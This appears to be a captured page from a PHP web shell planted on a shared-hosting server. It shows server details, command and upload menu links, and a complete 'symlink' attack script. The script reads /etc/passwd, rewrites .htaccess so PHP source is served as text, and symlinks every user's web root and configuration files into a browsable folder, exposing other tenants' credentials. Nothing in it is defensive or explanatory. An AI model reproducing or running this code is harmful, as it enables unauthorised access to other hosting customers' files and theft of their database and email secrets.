Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/skyispatudyog/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set("html_errors", "0"); @ini_set("display_errors", "0"); @ini_set("display_startup_errors", "0"); @ini_set("log_errors", "0"); @ini_set("html_errors", 0); @ini_set("max_execution_time", 0); @ini_set("display_errors", 0); @ini_set("file_uploads", 1); $folfig = "sym"; $usedir = "sym/Users"; @mkdir($folfig, 0777); @mkdir($usedir, 0777); @chdir($folfig); $uSr = file("/etc/passwd"); $htaccess = 'ForceType text/plain AddType text/plain .php AddType text/plain .html AddType text/html .shtml AddType txt .php AddHandler server-parsed .php AddHandler txt .php AddHandler txt .html AddHandler txt .shtml Options All'; file_put_contents(".htaccess",$htaccess); foreach ($uSr as $pwd) { $home = "home"; $pwdd = explode(":", $pwd); $userr = $pwdd[0]; $user = trim($userr); symlink("/", "000~ROOT~000"); symlink("/" . $home . "/" . $user . "/public_html/", "Users/0-".$user); copy("/" . $home . "/" . $user . "/public_html/", "Users/0-".$user); symlink("/" . $home . "/" . $user . "/public_html/index.php", $user . "_indexPHP.txt"); symlink("/" . $home . "/" . $user . "/public_html/config.php", $user . "_config.txt"); symlink("/" . $home . "/" . $user . "/public_html/email.php", $user . "_email.txt"); symlink("/" . $home . "/" . $user . "/public_html/config/email.php", $user . "_conf-email.txt"); symlink("/" . $home . "/" . $user . "/public_html/config/conf.php", $user . "_conf-conf.txt"); symlink("/" . $home . "/" . $user . "/public_html/tlgrm.php", $user . "_tlgrm.txt"); symlink("/" . $home . "/" . $user . "/public_html/next.php", $user . "_next.txt"); symlink("/" . $home . "/" . $user . "/public_html/configuration.php", $user . "_configuration.php.txt"); symlink("/" . $home . "/" . $user . "/public_html/settings.php", $user . "_settings.php.txt"); } echo "<center><i><b><a href=" . $folfig . ">Configs</a></b></i></center>"; echo "<center><i><b><a href=" . $usedir . ">Users</a></b></i></center>"; ?>